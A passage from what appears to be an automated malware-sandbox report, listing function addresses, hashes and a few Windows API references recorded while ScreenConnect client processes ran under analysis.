Instruction Fuzzy Hash: A191C430608A8D4FEB69DF28DC957E53BE1EF59311F04426FD84DC7292CA789945CB81

Function 00007FFD3466995B Relevance: 1.7, APIs: 1, Instructions: 179fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FFD34669A8C

Memory Dump Source

Source File: 00000002.00000002.3020882967.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd34660000_dfsvc.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 42e6312b29842009214d2dbf5ce0d7f5fda870c34dd3f4c12775d48ef918776a
Instruction ID: bb039a30ae5752b3c1380fc9a874a3903d0bee8df33628d38197cfe7f7474282
Opcode Fuzzy Hash: 42e6312b29842009214d2dbf5ce0d7f5fda870c34dd3f4c12775d48ef918776a
Instruction Fuzzy Hash: 7F51A131A0CA5C8FDB68DF58D845BE9BBE0FB69310F1442AEE04DD3252CB34A845CB81

Function 00007FFD3454EEBF Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3019540342.00007FFD3454D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3454D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd3454d000_dfsvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2fa2e5e2cffacc23468e479f4ebe18f0e5797416c2975b7f0c524dc772079f3
Instruction ID: ca71dab128e2886c8f7745605a6d7d50b89cf94a8040211bb60d24a3187f4f29
Opcode Fuzzy Hash: a2fa2e5e2cffacc23468e479f4ebe18f0e5797416c2975b7f0c524dc772079f3
Instruction Fuzzy Hash: 3E41037190DBC45FE757CB2898959523FF0EF57320B1501EFD088CB2A3D629A846C7A2

Analysis Process: ScreenConnect.WindowsClient.exePID: 5700, Parent PID: 5576COMMON

Execution Graph

Execution Coverage:	11.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	9
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD34674890 Relevance: 1.7, APIs: 1, Instructions: 228COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE ref: 00007FFD3468F2C6

Memory Dump Source

Source File: 00000009.00000002.2402180457.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34670000_ScreenConnect.jbxd

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 457a960446e58801dd707d17428269fa35ece437382720f6d273fb5a9c3b4550
Instruction ID: 7c3a9b5a34828cc8ab6508364ea93dc45351c5d4d6e43f481439a994c55fbbbb
Opcode Fuzzy Hash: 457a960446e58801dd707d17428269fa35ece437382720f6d273fb5a9c3b4550
Instruction Fuzzy Hash: B46109A2A0EAC84FE7159E5C6C552E97FE1EB97314F0442FFE0C8D7297D928E8058781

Function 00007FFD3467F67B Relevance: 1.7, APIs: 1, Instructions: 178fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00007FFD3467F7AC

Memory Dump Source

Source File: 00000009.00000002.2402180457.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34670000_ScreenConnect.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 8111b149a847345aa6fa030e7614de98d685b4b435266bf92921e53200f4b2a2
Instruction ID: f39f9bd4b9b20ae622f9ddfc35839499a67f11301f7135181455dbf2028d95ae
Opcode Fuzzy Hash: 8111b149a847345aa6fa030e7614de98d685b4b435266bf92921e53200f4b2a2
Instruction Fuzzy Hash: 77519371A0CA5C9FDB68DF58D855BE9BBE0FB59310F1442AEE04DD3252CB34A845CB81

Function 00007FFD346784B8 Relevance: 1.6, APIs: 1, Instructions: 107COMMON

Download Yara Rule

APIs

SetProcessMitigationPolicy.KERNELBASE ref: 00007FFD34678542

Memory Dump Source

Source File: 00000009.00000002.2402180457.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ffd34670000_ScreenConnect.jbxd

Similarity

API ID: MitigationPolicyProcess
String ID:
API String ID: 1088084561-0
Opcode ID: f4f28d7d4862ccab494201943e15a76881b92090e1d87222d1b6ddac1fea57e6
Instruction ID: 16e5797a5179b9cfe8fd366e567ad1f480ac29b16b30888a4da7dafb5c58b2f5
Opcode Fuzzy Hash: f4f28d7d4862ccab494201943e15a76881b92090e1d87222d1b6ddac1fea57e6
Instruction Fuzzy Hash: DC31C53191CB188FDB28AF9DDC4A5F97BE0EB65711F00412EE049D3251DB74B8458B81

Analysis Process: ScreenConnect.ClientService.exePID: 3488, Parent PID: 5700COMMON

Executed Functions

Function 014F20B5 Relevance: 1.6, Strings: 1, Instructions: 369COMMON

Download Yara Rule

Strings

, xrefs: 014F237E

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID: 0-76226702
Opcode ID: aec1898a992d54b5a06703bb6db3edb2d8de5cb9899f077cf294326c8c235a11
Instruction ID: 244c26ee76b69ce42fc7f7d2a9e22bbd5439a8e38c6405bf0b6e11cd33e38ab2
Opcode Fuzzy Hash: aec1898a992d54b5a06703bb6db3edb2d8de5cb9899f077cf294326c8c235a11
Instruction Fuzzy Hash: DB519F317002428FD715DB39D854AAEBBB2EF84210B14457ED60ADB365EFB5EC02CB91

Function 014F3480 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

[', xrefs: 014F3548

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: ['
API String ID: 0-410297704
Opcode ID: b4caec32de432d4b77203c8c60898a88b371149f6acfa57859c4fc3facafa20f
Instruction ID: 95260870e6b87ca4c724aec5360c2f812e2149a1998c5f55833f3031fddb60a2
Opcode Fuzzy Hash: b4caec32de432d4b77203c8c60898a88b371149f6acfa57859c4fc3facafa20f
Instruction Fuzzy Hash: 0931EF34B102129B8705EB6DA8A04AFBBE2FFD56503505A2DE619DB354EFB0ED058BD0

Function 014F7691 Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78ec03a11de47173dbcd611cee3f452970a81639e3ecd148df3030315707a78d
Instruction ID: 5f30106de78fbbdc09b3b2ad8a4e3460bd89acd53174e1ddff9b2c52d6f1e488
Opcode Fuzzy Hash: 78ec03a11de47173dbcd611cee3f452970a81639e3ecd148df3030315707a78d
Instruction Fuzzy Hash: 5851BD70D10219CFD705EFB8E895BD9BBB1EF85300F14965AE104AB391EB74A885CF91

Function 014F5238 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48666df653c716478052c48ae64f99bbf7267b8f03cbcb4185117db445a46619
Instruction ID: a7bd624f05cf818afd81efdb9fb6f3d7bb9110c676c473c4d87d9209c690d79f
Opcode Fuzzy Hash: 48666df653c716478052c48ae64f99bbf7267b8f03cbcb4185117db445a46619
Instruction Fuzzy Hash: 9161D634B106059FDB14DFA9D894AAEBBB2FF89315B109169E606AF365DB30EC01DF40

Function 014F6F40 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c78d9268061454d5cd87ed5ad2c9ba76038f3ba71dd2e9101f158c84b19a8796
Instruction ID: 97f8e2c1a74df5f5a0c0fa128b710168cb19e33e980d2a9388a8c4d4baff1945
Opcode Fuzzy Hash: c78d9268061454d5cd87ed5ad2c9ba76038f3ba71dd2e9101f158c84b19a8796
Instruction Fuzzy Hash: 7D512334B012119FDB249B78D864B6FBBF2BF84301F14852EEA469B3A5DB359C45C780

Function 014F7770 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d504db15cd9d922693ab5f534972e37830ecb63e078f6c56be6c30b24b00c882
Instruction ID: 9a236569f77cd6dacc3149fa2810566c3302887f8ab893ce78ffb4b4d9f22848
Opcode Fuzzy Hash: d504db15cd9d922693ab5f534972e37830ecb63e078f6c56be6c30b24b00c882
Instruction Fuzzy Hash: D851AE34E00319CFDB01EFB9D844B99BBB1FF89300F10865AE208AB295DB75A845CF51

Function 014F4940 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b10e4dbe3dc2314e64c35c5aebd6541f22aec73840e997f40c91f10f3c976e43
Instruction ID: 4ac70ccefb6408d871528cb34b8d06d9f5704ca84df540260d0d07fd577d8ff0
Opcode Fuzzy Hash: b10e4dbe3dc2314e64c35c5aebd6541f22aec73840e997f40c91f10f3c976e43
Instruction Fuzzy Hash: 64512A34600A01CFC724CF2AD484967BBF2FF8D324B189A5DE59A9B7A5DB31E805CB44

Function 014F1EAF Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fe057d5a4e90db2e485e4f53cff2003b9dc4c346e7af350e7b54964733232c1
Instruction ID: 7ca8d8201269628eb4c9d438665f35936f7cf18b80afd9705d8770ed71bb06fb
Opcode Fuzzy Hash: 2fe057d5a4e90db2e485e4f53cff2003b9dc4c346e7af350e7b54964733232c1
Instruction Fuzzy Hash: 144146297182C1CFC7079F34986A1A1BFA5ABA6A34344059FC7898B3B3CA318D55C7D2

Function 014F42F0 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce06db1339dab546d9818c2df0c8e482084d28b9aef0bed0e75e23c79145bde9
Instruction ID: 88f36b10f0bc63955f0c3e50e01200a48868536445bf5c76cc5ab5d769961af9
Opcode Fuzzy Hash: ce06db1339dab546d9818c2df0c8e482084d28b9aef0bed0e75e23c79145bde9
Instruction Fuzzy Hash: DD418034A00115CBDF15EF68E4946AEBF72EFC4310F18C569DA09AB359DF75A806CB90

Function 014F3828 Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef7f75df89d931437c454ad05ac9cbe98204d7c7b8d9b137c8f0f0cd0f679cde
Instruction ID: 55fdd4171ac4aefcea82f26782a2159a463205eadbe8db2b754f243a778a98b7
Opcode Fuzzy Hash: ef7f75df89d931437c454ad05ac9cbe98204d7c7b8d9b137c8f0f0cd0f679cde
Instruction Fuzzy Hash: 6141B874B082858FC7169B7888645AEBFF1FF86210B1941EFD584DF3A2DA359C05C7A1

Function 014F3678 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df9c4a221bf7a9218209eb21d9b451ab10bb1c027da9c700e05185fec112c27a
Instruction ID: e1926eede3d6c73956f3174740a863d8eca3605e6b83ce548be16535c6a8f0d0
Opcode Fuzzy Hash: df9c4a221bf7a9218209eb21d9b451ab10bb1c027da9c700e05185fec112c27a
Instruction Fuzzy Hash: 8E413A74600605CFDB34DF39D844A6ABBF1FF84310B108A2DE556977A5DB70E846CB90

Function 014F366F Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe04e102d9f0ddf14d81e6af811679a6e1db1254da0b836d40afc89b23be0332
Instruction ID: 3e2d1aa9edd98e83b72f4258ed4e7ccf7f364b8f0c82c05da39f54c0093a6cb0
Opcode Fuzzy Hash: fe04e102d9f0ddf14d81e6af811679a6e1db1254da0b836d40afc89b23be0332
Instruction Fuzzy Hash: 8F414874A00606CFDB24DF39D844A6ABBF1FF84310B108A2DE55A977A5DB31E946CB90

Function 014F3DC0 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0192e74b101e635716b346a3ad98835f36beb6d2d1e5b625619db45695150cc0
Instruction ID: d2af2ba2dbedad7756c2283d40b5df3f51807c0f52d7e2b9c0b985d82cede763
Opcode Fuzzy Hash: 0192e74b101e635716b346a3ad98835f36beb6d2d1e5b625619db45695150cc0
Instruction Fuzzy Hash: 02315A31B002058BDB149E69C458ABFFBF6EF89264F14946EE606E7364DB709C05CB90

Function 014F5548 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b98f8501a34fbb939afa59eac2e5817c55a0de3ae5054e2166bdf770c5892f1d
Instruction ID: 2c07a3a9ecbaa3e5158ec58212c4b7063cef3b392d4c1a34e71fdb5f5adef7a9
Opcode Fuzzy Hash: b98f8501a34fbb939afa59eac2e5817c55a0de3ae5054e2166bdf770c5892f1d
Instruction Fuzzy Hash: E6312E306007058FD730DF29D888967BBF2EF89321B144A1DD59ADB7A5D731E905CB91

Function 014F4FD0 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb420295c2bdd3cbd1c09127b7ffdcbb77315c082467cee5d19c57387467d0ad
Instruction ID: 657831ebfcbf2622ed56bcad26d7216c8ddd952e770aceeff6fbe5e2c5a3c9f2
Opcode Fuzzy Hash: fb420295c2bdd3cbd1c09127b7ffdcbb77315c082467cee5d19c57387467d0ad
Instruction Fuzzy Hash: C2314D31A0010DDFCF05DFA8D9849DDBBB2FF89304B55852AD6057B261DB35A90ACB90

Function 014F50C1 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce339e880f8b727dd0caa537d0d4ec4f994e7e76226a9d14184f2295405037bf
Instruction ID: 18faac3e9149365cd9199b08da316598c081cd5a30d8ae718f7d69e87851374f
Opcode Fuzzy Hash: ce339e880f8b727dd0caa537d0d4ec4f994e7e76226a9d14184f2295405037bf
Instruction Fuzzy Hash: 6F110631710205ABD704EB28F8907AEBFB2EFC5210F549629E245AF340DF706D068BE1

Function 014F6E40 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df8d8b08196ac4903372da112e6bb0142e8c2d6aa5b104be93c89dedc6e288d2
Instruction ID: 5884d58d1a992969fd5cbcb3217610d8097ac755717fdbcc90a59de62442c33d
Opcode Fuzzy Hash: df8d8b08196ac4903372da112e6bb0142e8c2d6aa5b104be93c89dedc6e288d2
Instruction Fuzzy Hash: 57110A32B093905FD7069B6998114977FB5EFC62103158A6FD108CB353DB759C098BD1

Function 014F4B70 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 163e75478612159403d6aa9b9530242e745822ab113925257b12e0c0063ee5ea
Instruction ID: 8219a40be516aeb59b5a43cbe0b12387572514cb1b35fc4b1469f074a0c53c7d
Opcode Fuzzy Hash: 163e75478612159403d6aa9b9530242e745822ab113925257b12e0c0063ee5ea
Instruction Fuzzy Hash: 7D212C302007059FD734CF29D84869BBBF1EF84320F048A2DE696977A5DB71A94ACF80

Function 014F50D0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cb8c05b0148f3c78f82257458e783dfc72d1e06fe8957f918d6b8b795ac0e11
Instruction ID: 81823f48db1c7047337ea0929364b29fa2842d60d18afb03bdac86640a7ffe41
Opcode Fuzzy Hash: 2cb8c05b0148f3c78f82257458e783dfc72d1e06fe8957f918d6b8b795ac0e11
Instruction Fuzzy Hash: 4711C8317102059BD704EB6CE890BAEBBA2FFC4210F949629E605AF344DF70BD058BD1

Function 014F4F41 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e2edc72dbcf3113bc6cb5f60082274dba886ed5c6c0eb72c3e1d2bc16b69a93
Instruction ID: d52accb9539e3a0dcdfd5664077556209308c2276c2b585d80d56a463c001e61
Opcode Fuzzy Hash: 4e2edc72dbcf3113bc6cb5f60082274dba886ed5c6c0eb72c3e1d2bc16b69a93
Instruction Fuzzy Hash: 9D11543690424ADFCF01DFA8C9409DEBBB1FF49304B50855AD609BF262D735AA09CF91

Function 014F5658 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d6c1205e6d612aa48132ed9a0cb2e7118df80184852eb02f007e534c08908da
Instruction ID: 62551ec88be5015c987e9b6cfd9786adb64d89af4b1d82be63afc2215915c808
Opcode Fuzzy Hash: 9d6c1205e6d612aa48132ed9a0cb2e7118df80184852eb02f007e534c08908da
Instruction Fuzzy Hash: 96118E70F00205AFEB15CE69D800AABBBB6AFC4310F54856AD61CDB361E77199028B91

Function 014F5035 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 218d2c756e9d356c80fd28813d3726c3f80959bb706d61aed5c93ba1587e20c8
Instruction ID: 56667eecf8f1bc4ffd1990389881cfb22c8af782883050261540fcf724b53381
Opcode Fuzzy Hash: 218d2c756e9d356c80fd28813d3726c3f80959bb706d61aed5c93ba1587e20c8
Instruction Fuzzy Hash: B511073150004DDFCF05DFA8D5848DDBFB2EF84314B59C55AE209AF226DB71A9468BA1

Function 014F1247 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79d0240148d61967b74d28a8b8a0c1ad0e11f39e1633615f118318c8b462c942
Instruction ID: e01b1b4266aba368cb1b2b6e49cb7875cbd434708c9c876b4406d6b590c19440
Opcode Fuzzy Hash: 79d0240148d61967b74d28a8b8a0c1ad0e11f39e1633615f118318c8b462c942
Instruction Fuzzy Hash: B3012479A00204DFCB02EBADD85049E7FE1EBC8A50701C16FEA0ED7315EF3298028B91

Function 014F5649 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07ba46ee6c16ee692b10eeba2aa875478240c86c30d3ab5f9083e0a50fe01aaf
Instruction ID: 373385cd2f29f36afa0163e6f8026cc30419d51774b6c4664ad8d634598144dc
Opcode Fuzzy Hash: 07ba46ee6c16ee692b10eeba2aa875478240c86c30d3ab5f9083e0a50fe01aaf
Instruction Fuzzy Hash: 4411C671E042049FEB11CF68D9006AF7BB5AF85310F4485ABD65CDB361D7719902CB91

Function 014F4F50 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8412aafb9f1c156f00d9a14bc2148aff2a2ba00865fa9561be3472136634a9f9
Instruction ID: b3bf2329031c98f6f0fe48ebb0bac2637ee495248c9c0154c7fbf1fd2b6a18e0
Opcode Fuzzy Hash: 8412aafb9f1c156f00d9a14bc2148aff2a2ba00865fa9561be3472136634a9f9
Instruction Fuzzy Hash: FF111236A0010ADFCF41DFA8D9809DEBBF5FF49314B508569E609BB251D771AA0ACF90

Function 010BD006 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2396902831.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10bd000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85fbba4d5c8f60882acf5d3a0b8aa5b193184bc950370d17d045d1e5866fce9c
Instruction ID: 61f54a50fa79043fcf46988a19d5497af782605b25ab9a83343ae80b2fe10c32
Opcode Fuzzy Hash: 85fbba4d5c8f60882acf5d3a0b8aa5b193184bc950370d17d045d1e5866fce9c
Instruction Fuzzy Hash: EF018C7140D3C09FE7128B658C84792BFA8EF43228F1984CBE9888F1A3C2695C45DB72

Function 010BD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2396902831.00000000010BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_10bd000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6127ea4d5c7ced2ce547c48451203f2f6590841c666a58c651c8cf0c91d44a3d
Instruction ID: ff0068dd88c24fd85577111e6dd4e475a2437782ecc0edc233a90357f994002a
Opcode Fuzzy Hash: 6127ea4d5c7ced2ce547c48451203f2f6590841c666a58c651c8cf0c91d44a3d
Instruction Fuzzy Hash: 9A01F7714043449AE7104AA9C9C0BA6FFD8DF413A8F08C45AFE884A282C6B99842C7B1

Function 014F1828 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a4b29f039bf6877094aa99a9ae132f084d82471483b268db6a73b4f62fc2234
Instruction ID: 02cd4d3ee8b8dcd8db092200b0240806a64061d46d1c5f02cf9ae5d182dee54c
Opcode Fuzzy Hash: 4a4b29f039bf6877094aa99a9ae132f084d82471483b268db6a73b4f62fc2234
Instruction Fuzzy Hash: 9F01B834A09280CFE3169B75961812A3FB1EF86A0071940EBD649CB376CB3A8C02CF12

Function 014F7FF8 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cda8a62dbe89845ff79a4d0e49cf156347b6d5ed4b74bd5ab1c98cbf38bf1505
Instruction ID: 8fda9056d9ed28e0f538b39df05a83a587867e21ea9ee2d9443db78959e5d62c
Opcode Fuzzy Hash: cda8a62dbe89845ff79a4d0e49cf156347b6d5ed4b74bd5ab1c98cbf38bf1505
Instruction Fuzzy Hash: 5001D17220D3808FD365DF28A442296BFE1AF95710F098C6FE4C9C7381DA36AC45CB66

Function 014F8168 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfdd6dac8fd1e7242ae874dd6864b55728fe5c3c98afd0bb3e04f0db06bef3c3
Instruction ID: 6a2f0e9b01578b8d088b68fbde1b931f0f18728bc6a1ddd4855250ab9892e1b9
Opcode Fuzzy Hash: dfdd6dac8fd1e7242ae874dd6864b55728fe5c3c98afd0bb3e04f0db06bef3c3
Instruction Fuzzy Hash: C0F08C37B0D2446FD728CABEA400A9BBBDECBD4220B14C07FE94DC3780E931A4008764

Function 014F12A0 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2397480861.00000000014F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_14f0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae1c8f4fa61e61fbe4ad86c9794f5b48935652ec88eb7660d4d6dc563b6a4cfe
